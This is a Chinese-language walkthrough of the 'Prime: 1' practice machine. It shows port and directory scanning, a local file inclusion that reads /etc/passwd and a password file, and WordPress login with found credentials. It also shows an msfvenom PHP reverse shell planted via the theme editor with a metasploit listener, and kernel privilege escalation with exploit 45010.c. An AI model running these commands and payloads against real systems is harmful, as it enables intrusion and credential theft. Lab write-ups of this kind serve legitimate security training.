最近发现一个很有趣的靶场集合，里面涵盖了一些基本的漏洞，我们通过漏洞复现。了解一些网络安全的一些基本操作。

PRIME:1靶机下载链接

Prime: 1

环境准备

安装Kali系统

安装方法请参考这篇文章https://blog.csdn.net/m0_55754984/article/details/119177156

把靶机导入到 VMware

1、把下载的Prime靶机，解压后导入到VMware中，网络适配器选择NAT，Kali的系统的也做同样的配置。

怎么拿到靶机的IP

1、首先查看kali的IP地址，如下：

2、由于靶机和Kali处于同一网络，所以通过扫描192.168.37.0/24这个C段的网络。即可找出靶机的IP.

拿到了靶机的IP了，接着需要发现靶机上开启了那些服务。

怎么发现服务

服务和端口是一一对应的，所以，我们可以通过端口扫描进行服务的发现。执行下面的命令进行端口扫描

nmap -sS -sV -p- -T5 192.168.37.129
1

执行完成，返回如下图：

通过观察上述结果，发现靶机开启了ssh服务和web服务。接着，我们在浏览器访问web服务看能得到什么信息。

通过查看web源码也没有发现，有用的信息。下一步，我们对网站的目录进行深入的挖掘。

目录扫描

目录扫描常用的工具是dirb,这个工具是kali自带的，执行如下命令进行目录的扫描

dirb http://192.168.37.129/
1

扫描的结果如下：

通过观察上述结果，发现几个可疑的目录，我逐一进行访问，看看能不能得到有用的信息。
访问http://192.168.37.129/dev，得到如下的调戏的话：

hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

1
2
3
4
5
6
7
8

大概的意思就是：现在你处于0级阶段，在现实生活中，我们应该使用我们的工具在网络上非常努力地挖掘。 快乐的黑客。

访问wordpress，出现一个简单博客页面，没有什么特别有用的信息。我们在进一步扫描，通过指定一些后缀进行扫描。执行如下的命令

dirb http://192.168.37.129/ -X .txt,.php,.zip
1

得到如下的结果：

通过观察上述的结果，发现三个可疑的目录，其中secret.txt,太可疑了，进行对它的访问，得到如下的内容：

得到提示信息：

1. 对于php文件做更多的fuzz，找到正确的参数parameter
2. 可以使用fuzz工具，比如git的：Fuzz_For_Web
3. 如果还是卡在这一步，去学学OSCP(Offensive Security Certified Professional)以Kali Linux 实际操作为主要内容的考试
4. 如果找到location.txt的位置，就知道下一步怎么做（先记住它，后面会用到）

Fuuz获得参数

测试index.php的参数，执行如下命令

 wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   http://192.168.37.129/index.php?FUZZ
1

结果如下：

过滤12个Word的结果，执行如下命令：

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12  http://192.168.37.129/index.php?FUZZ
1

执行结果如下：

根据上面的提示有个文件location.txt 访问 curl http://192.168.37.129/index.php?file=location.txt
得到如下图的结果：

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息。

通过访问curl http://192.168.37.129/image.php?secrettier360=/etc/passwd，得到如下信息：

通过观察上述的提示发现密码放在/home/saket/password.txt，结合刚才发现的读取文件到漏洞，我们构造一个链接curl http://192.168.37.129/image.php?secrettier360=/home/saket/password.txt。得如下的信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/img_convert/758dff8a8acf8402a9afb38d4d29aa8b.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=149&id=ua0f04a20&margin=%5Bobject%20Object%5D&name=image.png&originHeight=149&originWidth=748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=14161&status=done&style=none&taskId=ubd39509c-43bb-4997-8e26-1f5cf0ad682&title=&width=748#pic_center
发现了密码是：follow_the_ippsec。

wordpress漏洞利用

现在有了密码，但是没有用户名，可以通过wpsan进行扫描用户名，执行如下的命令：

wpscan --url http://192.168.37.129/wordpress/ --enumerate u
1

得到如下的结果：

发现了用户名victor。尝试用victor和follow_the_ippsec登录到wordpress的后台。发现能成功登录进入了。登录进入之后，利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。

生成php反弹shell

通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell
生成反弹shell命令如下：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=7777 -o shell.php
1

生成的代码直接更新到secret.php中。

删掉/*，写入生成的shell

配置metasploit

在kali主机上启动msfconsole，并执行 use exploit/multi/handler如下图：

配置 payload参数，执行如下命令：

set payload php/meterpreter/reverse_tcp
1

改参数要与生成反弹shell的保持一致(php/meterpreter/reverse_tcp)

配置监听的主机IP和端口号，执行的代码如下：

set lhost 192.168.37.128
set lport 7777
1
2

这两个参数也是要和反弹shell的一一对应的。

执行exploit启动监听操作， 访问 http://192.168.37.19/wordpress/wp-content/themes/twentynineteen/secret.php成功反弹shell。

成功进入shell之后，通过getuid发现用户是www-data，基本上没有什么权限。下一步进行提取操作。

提取

提取之前首先查看系统是什么版本，存在什么漏洞可以利用的。通过执行sysinfo命令查看系统版本信息，如下图：

通过观察上述结果发现，系统是Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu。执行msfconsole执行searchsploit 16.04 Ubuntu，结果如下：

由于靶机的内核版本是4.10.0-28，所以采用45010.c这个文件进行提权操作。先把45010.c从
/usr/share/exploitdb/exploits/linux/local/拷贝的root目录下进行编译。如下图：

把提权文件上传到靶机的/tmp目录下，如下图：

给45010文件赋予执行的权限，并执行。如下图：

注意：一定要进入交互shell才给45010修改权限和执行操作。执行shell之后，可以通过python -c "import pty;pty.spawn('/bin/bash');"获取整个交互shell。

规避漏洞风险

wp禁止主题编辑操作，通过在wp-config.php中，把define(‘DISALLOW_FILE_EDIT’,true)

参考资料：
prime1-笔记-无涯.pdf